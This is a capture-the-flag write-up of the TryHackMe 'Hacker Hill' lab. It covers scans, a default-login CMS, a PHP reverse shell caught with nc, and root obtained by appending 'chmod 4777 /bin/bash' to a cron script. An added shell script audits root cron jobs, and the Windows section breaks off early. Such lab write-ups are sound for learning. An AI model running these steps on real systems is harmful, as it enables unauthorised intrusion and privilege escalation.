Disclaimer
The host attacked in this article was used under legal authorization. The tools and methods shown here are for learning and discussion only; do not use the tools or the attack ideas in this article for any illegal purpose. I accept no responsibility for any consequences of doing so, nor for any misuse or damage caused.
Easy Challenge
Service discovery
┌──(root💀kali)-[~/tryhackme/hackerhill]
└─# nmap -sV -Pn 10.10.134.251
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 04:36 EDT
Nmap scan report for 10.10.134.251
Host is up (0.31s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
8001/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
8002/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
9999/tcp open  abyss?
Directory brute-force on port 8000
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u 10.10.134.251:8000

  _|. _ _  _  _  _ _|_    v0.3.8
 (_||| _) (/_(_|| (_| )

Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 6100

Error Log: /root/dirsearch/logs/errors-21-10-25_04-57-13.log

Target: 10.10.134.251:8000

[04:57:13] Starting:
[04:57:22] 200 -   2KB - /about
[04:57:33] 200 -   2KB - /contact
[04:57:47] 500 -  613B - /public_html/robots.txt
[04:57:47] 200 -   30B - /robots.txt
robots.txt reveals a CMS path
User-agent: *
Disallow: /vbcms
Opening it gives a login page. Tried admin:admin and it actually worked...
Once logged in there is a page editor that lets you change the page source directly. A quick test showed that PHP written there gets executed, so this is straightforward: write a web shell...
Start a listener, write the reverse shell into the homepage, then browse to it to trigger the connection back.
┌──(root💀kali)-[~/tryhackme/hackerhill]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.134.251] 59268
Linux web-serv 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 10:30:53 up  1:08,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(serv1) gid=1000(serv1) groups=1000(serv1),43(utmp)
$ whoami
serv1
According to the hint, the first flag is at /usr/games/fortune; take that value to the challenge website to redeem the flag TryHackMe actually asks for.
The second and third work the same way: follow the instructions to /var/lib/rary and /var/www/serv4/index.php, then redeem what you find on the same website for the required flags.
Privilege escalation
Upload linpeas.sh. It shows that /home/serv3/backups/backup.sh is run as root from a cron job, once a minute.
Check the permissions on the script
serv1@web-serv:/tmp$ ls -alh /home/serv3/backups/backup.sh
ls -alh /home/serv3/backups/backup.sh
-r-xr-xr-x 1 serv3 serv3 52 Feb 15  2021 /home/serv3/backups/backup.sh
serv1 has no write permission on this file (it is owned by serv3 and the group/other bits are r-x), so we first need to move laterally to serv3.
There is a secret.txt under /var/www/html/topSecretPrivescMethod. Judging by the directory name it is meant to be a privesc method, but the content is gibberish.
The PHP runner page at :8002/lesson/1 should have allowed executing a PHP reverse shell directly, but the page is tied to a Google front-end framework, so the PHP would not run and no shell came back.
After some effort to get around the Google framework problem...
Back on that page, write the PHP reverse shell and get a shell as serv3.
┌──(root💀kali)-[~/tryhackme/hackhill]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.172.149] 33814
Linux web-serv 4.15.0-135-generic #139-Ubuntu SMP Mon Jan 18 17:38:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 14:49:20 up  1:13,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1002(serv3) gid=1002(serv3) groups=1002(serv3)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(serv3) gid=1002(serv3) groups=1002(serv3)
As serv3, append the following command to backup.sh so that the next root run turns /bin/bash into a SUID binary. Note that the listing above shows mode r-x even for the owner, so if the append is refused with "Permission denied", run chmod u+w on the script first; serv3 owns it, and an owner may always change the mode. Mode 4755 would be enough for the effect we want; 4777 additionally leaves bash world-writable.
echo "chmod 4777 /bin/bash" >> /home/serv3/backups/backup.sh
After waiting a minute for the cron job to fire, run /bin/bash -p (keep the effective uid instead of dropping it) to get root.
serv3@web-serv:/$ /bin/bash -p
/bin/bash -p
bash-4.4# id
id
uid=1002(serv3) gid=1002(serv3) euid=0(root) groups=1002(serv3)
bash-4.4# cat /root/root.txt
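The two checks that drove this privesc (which root cron jobs fire every minute, and who can actually tamper with the script they run) written out as a small POSIX shell script. This is an added example, not part of the original write-up and not linpeas's code; the crontab text is a constructed sample modelled on the backup.sh job, and the function names and permission logic are mine.

```shell
#!/bin/sh
# Added example: triage root cron jobs for scripts a low-privileged user could tamper with.
# SAMPLE_CRONTAB is a constructed /etc/crontab (system format, with a user field),
# not output captured from the target.
SAMPLE_CRONTAB='# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*  *    * * *   root    /home/serv3/backups/backup.sh
*/5 *   * * *   serv1   /home/serv1/cleanup.sh'

# Print the command of every non-comment job that runs as root on a
# "* * * * *" schedule, i.e. once a minute, which is what makes the wait short.
every_minute_root_jobs() {
    printf '%s\n' "$1" | awk '
        /^[[:space:]]*#/ || NF < 7 { next }
        $1 == "*" && $2 == "*" && $3 == "*" && $4 == "*" && $5 == "*" && $6 == "root" {
            cmd = $7
            for (i = 8; i <= NF; i++) cmd = cmd " " $i
            print cmd
        }'
}

# Decide whether a user can end up modifying a file, from its `ls -l` fields.
#   $1 mode string (e.g. -r-xr-xr-x)  $2 file owner  $3 file group
#   $4 acting user  $5 that user's groups, space separated
# The owner can always chmod the file writable, so ownership alone is enough
# even when the owner write bit is off (serv3 here). POSIX consults exactly
# one class: owner, else group if the user is in the file's group, else others.
can_modify() {
    mode=$1 owner=$2 group=$3 user=$4 user_groups=$5
    if [ "$user" = "$owner" ]; then
        return 0
    fi
    case " $user_groups " in
        *" $group "*) bit=$(printf '%s' "$mode" | cut -c6) ;;   # group write bit
        *)            bit=$(printf '%s' "$mode" | cut -c9) ;;   # others write bit
    esac
    if [ "$bit" = "w" ]; then
        return 0
    fi
    return 1
}

# Stand-alone run: list candidate jobs, then evaluate the two users from this box
# against the listing shown above (-r-xr-xr-x serv3 serv3).
every_minute_root_jobs "$SAMPLE_CRONTAB"
if can_modify -r-xr-xr-x serv3 serv3 serv1 "serv1 utmp"; then
    echo "serv1 can modify backup.sh"
else
    echo "serv1 cannot modify backup.sh, pivot to serv3"
fi
if can_modify -r-xr-xr-x serv3 serv3 serv3 serv3; then
    echo "serv3 can modify backup.sh (chmod u+w first, then append)"
fi
```

The second function is the reason the lateral move was needed: serv1 is neither owner nor in group serv3 and the others bits are r-x, while serv3 owns the file and can flip the write bit itself. Note also the group rule: a user in the file's group is judged on the group bits alone, so a file that is world-writable but group r-x is still not writable to a group member.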
Medium Challenge
Service discovery
┌──(root💀kali)-[~/tryhackme/hackhill]
└─# nmap -sV -Pn 10.10.48.179
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-25 10:00 EDT
Nmap scan report for 10.10.48.179
Host is up (0.32s latency).
Not shown: 985 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
81/tcp   open  http          Microsoft IIS httpd 10.0
82/tcp   open  http          Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-10-25 14:01:00Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: troy.thm0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
9999/tcp open  abyss?
The medium box is a Windows machine (Kerberos, LDAP and SMB point to a domain controller for troy.thm) with many services exposed; go through them one by one.
Ports 80, 81 and 82 are all HTTP, so brute-force directories on each.
80
┌──(root💀kali)-[~/tryhackme/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.48.179

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/tryhackme/dirsearch/reports/10.10.48.179/_21-10-25_10-10-52.txt

Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-25_10-10-52.log

Target: http://10.10.48.179/

[10:10:53] Starting:
[10:11:00] 200 -   2KB - /%3f/
[10:11:00] 403 -  312B - /%2e%2e//google.com
[10:11:00] 403 -  312B - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:11:09] 403 -  312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:11:28] 403 -  312B - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[10:11:33] 302 -    0B - /dashboard  ->  /login
[10:11:48] 200 -   3KB - /login
[10:11:48] 200 -   3KB - /login/
[10:11:49] 302 -    0B - /logout/  ->  /
[10:11:49] 302 -    0B - /logout  ->  /
[10:12:26] 302 -    0B - /profile  ->  /login
[10:12:45] 200 -   3KB - /signup
81
┌──(root💀kali)-[~/tryhackme/dirsearch]
└─#